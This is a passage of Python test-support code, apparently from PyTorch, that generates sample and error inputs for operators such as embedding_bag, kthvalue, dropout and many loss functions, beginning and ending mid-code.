(2,)), ((S, S, S), (S, 1)), ((S, S, S), (S, -1))) for case in cases: shape, args = case yield(SampleInput(make_arg(shape), args=args)) def reference_inputs_chunk(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_chunk(op, device, dtype, requires_grad, **kwargs) make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) # shape x chunks x dim cases = ( ((13, 9, 11), 17, -1), ((13, 9, 11), 11, -1), ((13,), 12, -1), ((15,), 12, -1), ((15,), 7, 0), ((15,), 9, 0), ((3, 7), 9, 1), ((3, 7), 9, 0), ((3, 7), 2, 0), ((3, 7), 3, 0), ((3, 7), 1, 0), ((3, 7), 1, 1), ((4, 4), 2, 0), ) for shape, chunks, dim in cases: yield SampleInput(make_arg(shape), args=(chunks, dim)) def sample_inputs_kthvalue(op_info, device, dtype, requires_grad, **kwargs): def _tensor(shape, dtype=dtype, low=None, high=None): return make_tensor(shape, dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad) test_cases = [ (_tensor((S, S, S)), (2,)), (_tensor((S, S, S)), (2, 1,)), (_tensor((S, S, S)), (2, -1,)), (_tensor((S, S, S)), (2, 1, True,)), (_tensor((S, S, S)), (2, -1, True,)), (_tensor((S,)), (2, 0,)), (_tensor((S,)), (2, 0, True,)), (_tensor(()), (1,)), (_tensor(()), (1, 0,)), (_tensor(()), (1, 0, True)) ] return [SampleInput(tensor, args=args) for tensor, args in test_cases] def error_inputs_kthvalue(op_info, device, **kwargs): # tests overlapping output fails t = make_tensor(10, dtype=torch.float32, device=device) indices = torch.empty((), device=device, dtype=torch.long) si = SampleInput(t, args=(5,), kwargs={'out': (t, indices)}) k_out_of_range_err = "selected number k out of range for dimension" return (ErrorInput(si, error_regex="unsupported operation"), ErrorInput(SampleInput(torch.randn(2, 2, device=device), args=(3, 0)), error_regex=k_out_of_range_err), ErrorInput(SampleInput(torch.randn(2, 2, device=device), args=(3,)), error_regex=k_out_of_range_err), ErrorInput(SampleInput(torch.tensor(2, device=device), args=(3,)), error_regex=k_out_of_range_err),) def sample_inputs_dropout(op_info, device, dtype, requires_grad, *, train=None, valid_input_dim=None, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) if valid_input_dim: cases = ((S,) * i for i in valid_input_dim) else: cases = ((S, S), (S,), ()) p_vals = [0.0, 0.5, 1.0] # This is to handle special case for feature_alpha_dropout which has different # supported dtypes depending on `train` parameter training_vals = [train] if train is not None else [True, False] for case, p, training in product(cases, p_vals, training_vals): yield SampleInput(make_arg(case), kwargs=dict(p=p, training=training)) yield SampleInput(make_arg(case), kwargs=dict()) def sample_inputs_embedding_bag(op_info, device, dtype, requires_grad, **kwargs): def make_input(shape): return make_tensor(shape, device=device, dtype=dtype, requires_grad=requires_grad) def make_long_input(shape, *, low, high, noncontiguous=False): return make_tensor(shape, device=device, dtype=torch.long, low=low, high=high, noncontiguous=noncontiguous) def make_per_sample_weight(flag, idx): # a tensor of float / double weights, or None # to indicate all weights should be taken to be 1 if flag: return make_input(idx.shape) return None offsets = torch.tensor([0, 3], device=device, dtype=torch.long) for generate_per_sample_weight in (True, False): for mode in ('sum', 'mean', 'max'): # per_sample_weights is only supported for mode='sum' (got mode='****') if generate_per_sample_weight and mode in ('mean', 'max'): continue # 1-D index tensor idx = make_long_input((S,), low=0, high=M) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((M, S)), args=(idx,), kwargs={'offsets': offsets, 'mode': mode, 'per_sample_weights': per_sample_weights}) idx = make_long_input((S,), low=0, high=M, noncontiguous=True) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((M, S)), args=(idx,), kwargs={'offsets': offsets, 'mode': mode, 'per_sample_weights': per_sample_weights}) # bag with zero length idx = make_long_input((S,), low=0, high=M, noncontiguous=True) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((M, S)), args=(idx,), kwargs={'offsets': torch.tensor([0, 0, 3], device=device, dtype=torch.long), 'mode': mode, 'per_sample_weights': per_sample_weights}) # 2-D index tensor idx = make_long_input((S, S), low=0, high=M) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((M, S)), args=(idx,), kwargs={'mode': mode, 'per_sample_weights': per_sample_weights}) idx = make_long_input((S, S), low=0, high=M, noncontiguous=True) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((M, S)), args=(idx,), kwargs={'mode': mode, 'per_sample_weights': per_sample_weights}) # The gradient vector at `padding_idx` is not updated. # Negative padding_idx idx = make_long_input((6,), low=0, high=S) idx[0] = 4 idx[4] = 4 per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((S, S)), args=(idx,), kwargs={'padding_idx': -1, 'offsets': offsets, 'mode': mode, 'per_sample_weights': per_sample_weights},) idx = make_long_input((3, 3), low=0, high=S) # Positive padding_idx idx[0, 0] = 2 idx[1, 1] = 2 per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((S, S)), args=(idx,), kwargs={'padding_idx': 2, 'mode': mode, 'per_sample_weights': per_sample_weights},) idx = make_long_input((6, ), low=0, high=S) weights = make_input((S, S)) offsets_ = torch.tensor([0, 3, 6], device=device, dtype=torch.long) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(weights, args=(idx,), kwargs={'mode': mode, 'offsets': offsets_, 'include_last_offset': True},) if not requires_grad: # Following inputs return different gradient from the numerical gradient. # This is expected and relevant tests are present in `test_nn.py`. # Due to inplace renorming of weight, the numerical gradient doesn't match the # analytical gradient. idx = make_long_input((2, 2), low=0, high=S) weights = make_input((S, S)) * 2 per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(weights, args=(idx,), kwargs={'max_norm': 1., 'mode': mode, 'per_sample_weights': per_sample_weights},) idx = make_long_input((6, ), low=0, high=S) weights = make_input((S, S)) * 2 per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(weights, args=(idx,), kwargs={'max_norm': 1., 'norm_type': 1.0, 'mode': mode, 'offsets': offsets, 'per_sample_weights': per_sample_weights},) if mode != 'max': # Scale the gradient based on the inverse frequency of a particular index. # Note : smax mode does not support sparse weights idx = make_long_input((2, 2), low=0, high=S) idx[0, 0] = 1 idx[0, 1] = 1 weights = make_input((S, S)) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(weights, args=(idx,), kwargs={'scale_grad_by_freq': True, 'mode': mode, 'per_sample_weights': per_sample_weights},) # gradcheck not implemented for sparse tensors. # Note : max mode does not support sparse weights idx = make_long_input((6, ), low=0, high=S) weights = make_input((S, S)) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(weights, args=(idx,), kwargs={'sparse': True, 'offsets': offsets, 'mode': mode, 'per_sample_weights': per_sample_weights}) idx = make_long_input((6, ), low=0, high=S) idx[0] = 1 # freq more than 1 idx[1] = 1 # freq more than 1 idx[3] = 0 # padding_idx weights = make_input((S, S)) * 2 per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(weights, args=(idx,), kwargs={'sparse': True, 'scale_grad_by_freq': True, 'padding_idx': 0, 'max_norm': 1., 'offsets': offsets, 'mode': mode, 'per_sample_weights': per_sample_weights}) def sample_inputs_embedding(op_info, device, dtype, requires_grad, **kwargs): def make_input(shape): return make_tensor(shape, device=device, dtype=dtype, requires_grad=requires_grad) def make_long_input(shape, *, low, high): return make_tensor(shape, device=device, dtype=torch.long, low=low, high=high) # 0-D index tensor idx = make_long_input((), low=0, high=M) yield SampleInput(make_input((M, S)), args=(idx,),) # 1-D index tensor idx = make_long_input((S,), low=0, high=M) yield SampleInput(make_input((M, S)), args=(idx,),) # 2-D index tensor idx = make_long_input((S, S), low=0, high=M) yield SampleInput(make_input((M, S)), args=(idx,),) if not requires_grad: # Following inputs return different gradient from the numerical gradient. # This is expected and relevant tests are present in `test_nn.py`. # The gradient vector at `padding_idx` is not updated. idx = make_long_input((2, 2), low=0, high=S) idx[0, 0] = 2 idx[1, 1] = 2 yield SampleInput(make_input((S, S)), args=(idx,), kwargs={'padding_idx': 2},) idx = make_long_input((2, 2), low=0, high=S) idx[0, 0] = 4 idx[1, 1] = 4 yield SampleInput(make_input((S, S)), args=(idx,), kwargs={'padding_idx': -1},) # Due to inplace renorming of weight, the numerical gradient doesn't match the # analytical gradient. idx = make_long_input((2, 2), low=0, high=S) weights = make_input((S, S)) * 2 yield SampleInput(weights, args=(idx,), kwargs={'max_norm': 1.},) idx = make_long_input((2, 2), low=0, high=S) weights = make_input((S, S)) * 2 yield SampleInput(weights, args=(idx,), kwargs={'max_norm': 1., 'norm_type': 1.0},) # Scale the gradient based on the inverse frequency of a particular index. idx = make_long_input((2, 2), low=0, high=S) idx[0, 0] = 1 idx[0, 1] = 1 weights = make_input((S, S)) yield SampleInput(weights, args=(idx,), kwargs={'scale_grad_by_freq': True},) # gradcheck not implemented for sparse tensors. idx = make_long_input((2, 2), low=0, high=S) weights = make_input((S, S)) yield SampleInput(weights, args=(idx,), kwargs={'sparse': True}) idx = make_long_input((3, 3), low=0, high=S) idx[0, 0] = 1 # freq more than 1 idx[0, 1] = 1 # freq more than 1 idx[1, 0] = 0 # padding_idx weights = make_input((S, S)) * 2 yield SampleInput(weights, args=(idx,), kwargs={'sparse': True, 'scale_grad_by_freq': True, 'padding_idx': 0, 'max_norm': 1.}) def sample_inputs_one_hot(op_info, device, dtype, requires_grad, **kwargs): def make_input(shape, *, low, high): return make_tensor(shape, device=device, dtype=dtype, low=low, high=high, requires_grad=requires_grad) shapes = ((), (S,), (L, M, S)) num_classess = (-1, 10) return [ SampleInput( make_input( shape, low=0, high=10 if num_classes == -1 else num_classes // 2, ), kwargs=dict(num_classes=num_classes), ) for shape, num_classes in itertools.product(shapes, num_classess) ] def sample_inputs_tensorinv(op_info, device, dtype, requires_grad, **kwargs): make_arg = make_fullrank_matrices_with_distinct_singular_values def make_input(): return make_arg(12, 12, device=device, dtype=dtype, requires_grad=requires_grad) # lhs / rhs shape can have any number of dimensions as long as their product equals 12 shapes = [ ((2, 2, 3), (12, 1)), ((4, 3), (6, 1, 2)), ] samples = [] for shape_lhs, shape_rhs in shapes: inp = make_input().reshape(*shape_lhs, *shape_rhs).detach() inp.requires_grad_(requires_grad) samples.append(SampleInput(inp, kwargs=dict(ind=len(shape_lhs)))) return samples def sample_inputs_tensorsolve(op_info, device, dtype, requires_grad, **kwargs): a_shapes = [(2, 3, 6), (3, 4, 4, 3)] # Zero-dim tensors are not supported in NumPy, so we skip them for now. # NumPy is used in reference check tests. # See https://github.com/numpy/numpy/pull/20482 for tracking NumPy bugfix. # a_shapes += [(0, 0, 1, 2, 3, 0)] dimss = [None, (0, 2)] for a_shape, dims in itertools.product(a_shapes, dimss): a = make_tensor(a_shape, dtype=dtype, device=device, requires_grad=requires_grad) b = make_tensor(a_shape[:2], dtype=dtype, device=device, requires_grad=requires_grad) yield SampleInput(a, args=(b,), kwargs=dict(dims=dims)) def sample_inputs_loss(op_info, device, dtype, requires_grad, **kwargs): rhs_requires_grad = kwargs.get('rhs_requires_grad', requires_grad) _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Although most losses also support the reduce and size_average combination instead of reduce, the former is # deprecated since 0.4.1 and thus is not tested shapes_and_kwargs = ( ((), None), ((S,), dict(reduction="mean")), ((S,), dict(reduction="sum")), ((S,), dict(reduction="none")), ((S, S), None), ((S, S, S), None), ) for shape, kwargs in shapes_and_kwargs: yield SampleInput(_make_tensor(shape), args=(_make_tensor(shape, requires_grad=rhs_requires_grad),), kwargs=kwargs) def sample_inputs_grid_sample(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) batch_size = 2 num_channels = 3 modes = ("bilinear", "nearest") align_cornerss = (False, True) padding_modes = ("zeros", "border", "reflection") sample_inputs = [] for dim in (2, 3): modes_ = (*modes, "bicubic") if dim == 2 else modes for mode, padding_mode, align_corners in itertools.product(modes_, padding_modes, align_cornerss): sample_inputs.append( SampleInput( _make_tensor((batch_size, num_channels, *[S] * dim)), args=(_make_tensor((batch_size, *[S] * dim, dim)),), kwargs=dict( mode=mode, padding_mode=padding_mode, align_corners=align_corners, ) ) ) return sample_inputs def sample_inputs_cosine_embedding_loss(op_info, device, dtype, requires_grad, **kwargs): make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) def make_target(shape): shape = () if len(shape) == 1 else (shape[0], ) t = torch.randint(0, 2, shape, device=device, dtype=torch.long) # Label with -1 or 1 t = t * 2 - 1 target = t.to(dtype=dtype).detach_().requires_grad_(requires_grad) return target shapes = ((S, S), (S,)) reductions = ('none', 'mean', 'sum') for s, r in product(shapes, reductions): yield SampleInput( make_input(s), args=(make_input(s), make_target(s)), kwargs=dict(reduction=r, margin=random.uniform(-1, 1)) ) def sample_inputs_ctc_loss(op_info, device, dtype, requires_grad, **kwargs): input_length = 50 batch = 16 num_char = 20 target_length = 30 def make_log_probs(s): t = make_tensor(s, device=device, dtype=dtype) log_probs = t.log_softmax(2).to(device=device, dtype=dtype).detach().requires_grad_(requires_grad=requires_grad) return log_probs reductions = ('none', 'mean', 'sum') zero_inf = (True, False) for r, z in product(reductions, zero_inf): log_probs = make_log_probs((input_length, batch, num_char)) targets = torch.randint(1, num_char, (batch, target_length), dtype=torch.long, device=device) input_lengths = torch.full((batch, ), input_length, dtype=torch.long, device=device) target_lengths = torch.randint(10, target_length, (batch, ), dtype=torch.long, device=device) yield SampleInput(log_probs, args=(targets, input_lengths, target_lengths,), kwargs=dict(reduction=r, zero_infinity=z)) def sample_inputs_nll_loss(op_info, device, dtype, requires_grad, **kwargs): shape = (2, 3) num_classes = shape[1] make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # FIXME: Derivative wrt. weight not implemented make_weight = partial(make_tensor, num_classes, device=device, dtype=dtype, requires_grad=False) def make_target(shape, zeros=False): s = (shape[0], *shape[2:]) if len(shape) > 1 else () if zeros: return torch.zeros(s, device=device, dtype=torch.long) else: return make_tensor(s, low=0, high=shape[1] if len(shape) > 1 else shape[0], device=device, dtype=torch.long) def gen_shape_kwargs(): # Batched, non-batched and 2d shapes = (shape, (num_classes,), shape + (2, 2)) reductions = ('none', 'mean', 'sum') for reduction, s in product(reductions, shapes): yield make_input(s), make_target(s), dict(reduction=reduction) yield make_input(s), make_target(s), dict(weight=make_weight(), reduction=reduction) yield make_input(s), make_target(s), dict(weight=make_weight(low=0), reduction=reduction) yield make_input(s), make_target(s), dict(weight=make_weight(high=0), reduction=reduction) t = make_target(s) ignore = num_classes // 2 # If "mean", nll returns NaN, so it's not differentiable at those points if t.eq(ignore).all() and reduction == "mean": t.fill_(0) yield make_input(s), t, dict(ignore_index=num_classes // 2, reduction=reduction) yield make_input(s), t, dict(ignore_index=num_classes // 2, reduction=reduction, weight=make_weight()) # Test ignoring all the targets # If "mean", nll returns NaN, so it's not differentiable at those points if reduction != "mean": yield make_input(s), make_target(s, zeros=True), dict(ignore_index=0, reduction=reduction) for input, target, kwargs in gen_shape_kwargs(): yield SampleInput(input, args=(target,), kwargs=kwargs) def sample_inputs_binary_cross_entropy_with_logits( op_info, device, dtype, requires_grad, **kwargs ): make = partial(make_tensor, device=device, dtype=dtype) make_prob = partial(make, low=0, high=1) reductions = ("mean", "sum", "none") def make_weight_shape_kwargs(): kwargs = [] for shape in ((1,), (1, S), (S), (S, S)): kwargs.extend([((S, S), dict(reduction=reduction, weight=make(shape))) for reduction in reductions]) return kwargs shapes_and_kwargs = [ *[(shape, None) for shape in ((), (1,), (S,), (S, S), (S, S, S))], *[((S, S), dict(reduction=reduction)) for reduction in reductions], *make_weight_shape_kwargs(), *[((S, S), dict(reduction=reduction, pos_weight=make((S,), low=0))) for reduction in reductions], *[((S, S), dict(reduction=reduction, weight=make((S, S)), pos_weight=make((S,), low=0))) for reduction in reductions], ] for shape, kwargs in shapes_and_kwargs: yield SampleInput( make(shape, requires_grad=requires_grad), args=(make_prob(shape, requires_grad=requires_grad),), kwargs=kwargs, ) def sample_inputs_argwhere(op_info, device, dtype, requires_grad, **kwargs): yield SampleInput(torch.tensor([1, 0, 2, 0], dtype=dtype, device=device, requires_grad=requires_grad)) mask = torch.tensor([[0, 1, 0, 1, 0], [1, 1, 1, 1, 0], [0, 0, 0, 1, 0], [1, 0, 1, 1, 0], [1, 0, 0, 1, 0]], dtype=torch.bool, device=device) t = make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad) t[mask] = 0 yield SampleInput(t) t = make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad, noncontiguous=True) t[mask] = 0 yield SampleInput(t) t = make_tensor((S, 0), dtype=dtype, device=device, requires_grad=requires_grad) yield SampleInput(t) yield SampleInput(torch.zeros((S,), dtype=dtype, device=device, requires_grad=requires_grad)) yield SampleInput(make_tensor((), dtype=dtype, device=device, requires_grad=requires_grad)) def _generate_sample_shape_reduction(): shapes = ((S,), (S, S), (S, S, S)) reductions = ('none', 'mean', 'sum') for s, r in product(shapes, reductions): yield s, r def sample_inputs_gaussian_nll_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Set low slightly above 0 so gradcheck doesn't accidentally dip below 0 make_var = partial(make_tensor, low=0.1, device=device, dtype=dtype, requires_grad=requires_grad) def gen_shape(shape): yield shape # Broadcast yield (*shape[:-1], 1) yield shape[:-1] def gen_shape_kwargs(): for s, r in _generate_sample_shape_reduction(): for t_s, v_s in product(gen_shape(s), gen_shape(s)): yield _make_tensor(s), _make_tensor(t_s), make_var(v_s), dict(reduction=r) yield ( _make_tensor(s), _make_tensor(t_s), make_var(v_s), dict(full=True, reduction=r) ) yield ( _make_tensor(s), _make_tensor(t_s), make_var(v_s), dict(eps=random.uniform(1e-6, 1e-3), reduction=r) ) yield ( _make_tensor(s), _make_tensor(t_s), make_var(v_s), dict(full=True, eps=random.uniform(1e-6, 1e-3), reduction=r) ) for input, target, var, kwargs in gen_shape_kwargs(): yield SampleInput(input, args=(target, var, ), kwargs=kwargs) def _generate_sample_inputs_nn_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) for s, r in _generate_sample_shape_reduction(): yield _make_tensor(s), _make_tensor(s), dict(reduction=r) def sample_inputs_hinge_embedding_loss(op_info, device, dtype, requires_grad, **kwargs): for input, target, d in _generate_sample_inputs_nn_loss(op_info, device, dtype, requires_grad, **kwargs): # target should contain either 1 or -1 as per docs mask = torch.rand_like(target) > 0.5 target[mask] = 1 target[~mask] = -1 d['margin'] = random.uniform(-9, 9) yield SampleInput(input, args=(target, ), kwargs=d) # scalar input and target. _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(_make_tensor(()), args=(_make_tensor(()), )) def error_inputs_hinge_embedding_loss(op, device, **kwargs): make_input = partial(make_tensor, device=device, dtype=torch.float32) # invalid reduction value yield ErrorInput(SampleInput(make_input(5, 4), args=(make_input(5, 4),), kwargs={'reduction': 'abc'}), error_type=ValueError, error_regex='is not a valid value') def reference_inputs_hinge_embedding_loss(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_hinge_embedding_loss(op, device, dtype, requires_grad, **kwargs) make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) for reduction in ('sum', 'mean', 'none'): if dtype.is_floating_point: # only supports ints and floats # NaN propagation inp = make_input((10, )) inp[2] = float('nan') target = make_input((10, )) # target should contain either 1 or -1 as per docs mask = torch.rand_like(target) > 0.5 target[mask] = -1 target[~mask] = 1 yield SampleInput(inp, args=(target,), kwargs={'reduction': reduction}) # Inf Handling inp = make_input((10, )) inp[4] = float('inf') target = make_input((10, )) mask = torch.rand_like(target) > 0.5 target[mask] = -1 target[~mask] = 1 yield SampleInput(inp, args=(target,), kwargs={'reduction': reduction}) # Broadcasting inp = make_input((5, 5)) target = make_input((1, 5)) mask = torch.rand_like(target) > 0.5 target[mask] = -1 target[~mask] = 1 yield SampleInput(inp, args=(target,), kwargs={'reduction': reduction}) def sample_inputs_huber_loss(op_info, device, dtype, requires_grad, **kwargs): for input, target, d in _generate_sample_inputs_nn_loss(op_info, device, dtype, requires_grad, **kwargs): d['delta'] = random.uniform(1e-3, 9) yield SampleInput(input, args=(target, ), kwargs=d) def sample_inputs_poisson_nll_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) def gen_shape_kwargs(): for s, r in _generate_sample_shape_reduction(): for li in (True, False): for f in (True, False): i1 = _make_tensor(s) i2 = _make_tensor(s) # For Poisson NLL Loss, # target is assumed to be from # Poisson Distribution which # always has positive samples t1 = _make_tensor(s, low=0) t2 = _make_tensor(s, low=0) if not li: i1.abs_() i2.abs_() t1.abs_() t2.abs_() yield ( i1, t1, dict(log_input=li, full=f, reduction=r) ) yield ( i2, t2, dict(log_input=li, full=f, eps=random.uniform(1e-8, 1e-3), reduction=r) ) for input, target, kwargs in gen_shape_kwargs(): yield SampleInput(input, args=(target, ), kwargs=kwargs) def sample_inputs_triplet_margin_loss(op_info, device, dtype, requires_grad, with_distance=False, **kwargs): make = partial(make_tensor, (S, M), device=device, dtype=dtype, requires_grad=requires_grad) kwargss = ( *[dict(margin=margin) for margin in (1e-6, 1.0, 10.0)], dict(swap=True), *[dict(reduction=reduction) for reduction in ("mean", "sum", "none")], ) for kwargs in kwargss: input = make() args = (make(), make()) if with_distance: kwargs["distance_function"] = torch.nn.PairwiseDistance() yield SampleInput(input, args=args, kwargs=kwargs) def sample_inputs_pairwise_distance(op_info, device, dtype, requires_grad, **kwargs): make = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) shape = (3,) batched_shape = (2, *shape) shapes_and_kwargs = [ (shape, None), (batched_shape, None), (shape, dict(keepdim=True)), (batched_shape, dict(keepdim=True)), (shape, dict(p=5.0)), (shape, dict(p=-1.0)), (shape, dict(eps=1.0)), ] return [ SampleInput(make(shape), args=(make(shape),), kwargs=kwargs) for shape, kwargs in shapes_and_kwargs ] def sample_inputs_pixel_shuffle(op_info, device, dtype, requires_grad, **kwargs): return [ SampleInput( make_tensor((1, 9, 2, 2), device=device, dtype=dtype, requires_grad=requires_grad), kwargs=dict(upscale_factor=upscale_factor), ) for upscale_factor in (1, 3) ] def sample_inputs_pixel_unshuffle(op_info, device, dtype, requires_grad, **kwargs): return [ SampleInput( make_tensor((1, 1, 6, 6), device=device, dtype=dtype, requires_grad=requires_grad), kwargs=dict(downscale_factor=downscale_factor), ) for downscale_factor in (1, 3) ] def sample_inputs_binary_cross_entropy(op_info, device, dtype, requires_grad, logits=False, **kwargs): make = partial(make_tensor, device=device, dtype=dtype) make_prob = partial(make, low=0, high=1) reductions = ("mean", "sum", "none") shapes_and_kwargs = [ *[(shape, None) for shape in ((), (1,), (S,), (S, S), (S, S, S))], *[((S, S), dict(reduction=reduction)) for reduction in reductions], *[((S, S), dict(reduction=reduction, weight=make((S, S)))) for reduction in reductions], ] if logits: shapes_and_kwargs.extend( [((S, S), dict(reduction=reduction, pos_weight=make((S,), low=0))) for reduction in reductions] ) for shape, kwargs in shapes_and_kwargs: yield SampleInput( (make if logits else make_prob)(shape, requires_grad=requires_grad), args=(make_prob(shape, requires_grad=requires_grad),), kwargs=kwargs, ) def sample_inputs_allclose(op_info, device, dtype, requires_grad, **kwargs): samples = [] sample_shapes = [(), (S), (S, S, S)] atols = [1e-2, 1e-16] rtols = [1e-1, 0.5] eps = 1e-8 for s, rtol, atol in product(sample_shapes, rtols, atols): # close sample t = make_tensor(s, device=device, dtype=dtype, requires_grad=requires_grad) close = (t + atol).detach().requires_grad_(requires_grad) close_sample = SampleInput(t, args=(close,), kwargs=dict(rtol=rtol, atol=atol)) samples.append(close_sample) # random sample a = make_tensor(s, device=device, dtype=dtype, requires_grad=requires_grad) b = make_tensor(s, device=device, dtype=dtype, requires_grad=requires_grad) r_sample = SampleInput(a, args=(b,), kwargs=dict(rtol=rtol, atol=atol)) samples.append(r_sample) return samples def sample_inputs_l1_loss(op_info, device, dtype, requires_grad, **kwargs): yield from sample_inputs_loss(op_info, device, dtype, requires_grad, **kwargs) # In addition to the regular test cases, we add two for mixed floating point and complex inputs if dtype.is_complex: make = partial(make_tensor, (), device=device, requires_grad=requires_grad) yield SampleInput(make(dtype=dtype), args=(make(dtype=torch.double),)) yield SampleInput(make(dtype=torch.double), args=(make(dtype=dtype),)) def sample_inputs_smooth_l1_loss(op_info, device, dtype, requires_grad, **kwargs): yield from sample_inputs_loss(op_info, device, dtype, requires_grad, **kwargs) make = partial(make_tensor, (S, S), device=device, dtype=dtype, requires_grad=requires_grad) # This test case always triggers the smooth condition, since absolute difference of input and target # is smaller than beta yield SampleInput(make(low=0, high=2), args=(make(low=-2, high=0),), kwargs=dict(beta=5)) yield SampleInput(make(), args=(make(),), kwargs=dict(beta=0)) def sample_inputs_kl_div(op_info, device, dtype, requires_grad, **kwargs): make = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) shapes_and_reduction = [ ((2,), "mean"), ((2, 3), "mean"), ((2, 3, 4), "mean"), ((2,), "none"), ((2,), "batchmean"), ((2,), "sum"), ] sample_inputs = [] for (shape, reduction), log_target in itertools.product(shapes_and_reduction, (True, False)): # input should be log-probability, i.e. lie in (-inf, 0] input = make(shape, low=None, high=0) # target should be a probability by default, i.e. lie in [0, 1], and a log-probability if log_target is set, # i.e. lie in (-inf, 0] target = make(shape, low=None, high=0) if log_target else make(shape, low=0, high=1) sample_inputs.append( SampleInput(input, args=(target,), kwargs=dict(reduction=reduction, log_target=log_target)) ) return sample_inputs def sample_inputs_pdist(op_info, device, dtype, requires_grad, **kwargs): make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) yield from (SampleInput(make_input((n, m))) for n, m in itertools.product((1, S), repeat=2)) yield from (SampleInput(make_input((S, S)), kwargs=dict(p=p)) for p in (0.0, 1.0, 2.0, 10.0, float("inf"))) def reference_pdist(input, p=2): pdist = scipy.spatial.distance.pdist if p == 0: output = pdist(input, "hamming") * input.shape[1] elif p == float("inf"): output = pdist(input, lambda x, y: np.abs(x - y).max()) else: output = pdist(input, "minkowski", p=p) return output.astype(input.dtype) def sample_inputs_diagflat(op_info, device, dtype, requires_grad, **kwargs): make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) return [ SampleInput(make_input(())), SampleInput(make_input((2,))), SampleInput(make_input((2, 2))), SampleInput(make_input((2,)), kwargs=dict(offset=1)), SampleInput(make_input((2,)), kwargs=dict(offset=-1)), ] def sample_inputs_max_unpool(op_info, device, dtype, requires_grad, **kwargs): unpool_name_to_pool_method_dict = { 'nn.functional.max_unpool1d': torch.nn.functional.max_pool1d, 'nn.functional.max_unpool2d': torch.nn.functional.max_pool2d, 'nn.functional.max_unpool3d': torch.nn.functional.max_pool3d } unpool_name_to_dim = { 'nn.functional.max_unpool1d': 1, 'nn.functional.max_unpool2d': 2, 'nn.functional.max_unpool3d': 3 } unpool_to_pool_name_dict = dict(( (k, f'nn.functional.{v.__name__}') for k, v in unpool_name_to_pool_method_dict.items() )) pool_dim = unpool_name_to_dim[op_info.name] pool_method = unpool_name_to_pool_method_dict[op_info.name] pool_op_info = copy.copy(op_info) pool_op_info.name = unpool_to_pool_name_dict[op_info.name] for sample in sample_inputs_max_pool(pool_op_info, device, dtype, requires_grad, **kwargs): # shapes (C, ...) do not work as of now, # see https://github.com/pytorch/pytorch/issues/68337 # TODO: remove once the issue is resolved if sample.input.dim() != pool_dim + 2: continue # No dilation > 1 for max_unpool, # see https://github.com/pytorch/pytorch/issues/68420 if sample.kwargs['dilation'] != 1: continue # Can't unpool without indices if sample.kwargs['return_indices']: pool, indices = pool_method(sample.input, **sample.kwargs) # arg has to be a leaf arg = pool.detach().requires_grad_(requires_grad) sample_kwargs = { 'kernel_size': sample.kwargs['kernel_size'], 'stride': sample.kwargs['stride'], 'padding': sample.kwargs['padding'], # output_size could be None but we specify it explicitly # to compensate for the information lose in pool due # to the floor/ceil operation used to compute the shapes 'output_size': sample.input.size() } yield SampleInput(arg, args=(indices,), kwargs=sample_kwargs) def sample_inputs_max_unpool_grad(op_info, device, dtype, requires_grad, **kwargs): for sample in sample_inputs_max_unpool(op_info, device, dtype, requires_grad, **kwargs): indices = sample.args[0] # The samples for max_unpool are generated with max_pool. # It could be that a single element from the max_pool's # input is mapped to several locations in its output. # This situation leads to failed gradchecks because # the finite difference algorithm perturbes the elements # of the output one by one, and not in classes of # equivalences determined by whether two elements # in the output are coming from the same location in the # input (simply put, they have the same corresponding index). # So, there are two ways to resolve this issue: # 1. Extract a pertubation for one element and apply it all # the elements from the same equivalence class, or # 2. Make sure that the equivalence classes are all singletons, # i.e. the index tensor has to be comprised of only unique # indices. # Here we go with the solution 2, the easiest of all. if indices.unique().numel() == indices.numel(): yield sample foreach_unary_op_db: List[OpInfo] = [ ForeachFuncInfo('exp'), ForeachFuncInfo('acos'), ForeachFuncInfo('asin'), ForeachFuncInfo('atan'), ForeachFuncInfo('cos'), ForeachFuncInfo('cosh'), ForeachFuncInfo('log'), ForeachFuncInfo('log10'), ForeachFuncInfo('log2'), ForeachFuncInfo('tan'), ForeachFuncInfo('tanh'), ForeachFuncInfo('sin'), ForeachFuncInfo('sinh'), ForeachFuncInfo( 'neg', dtypes=all_types_and_complex(), 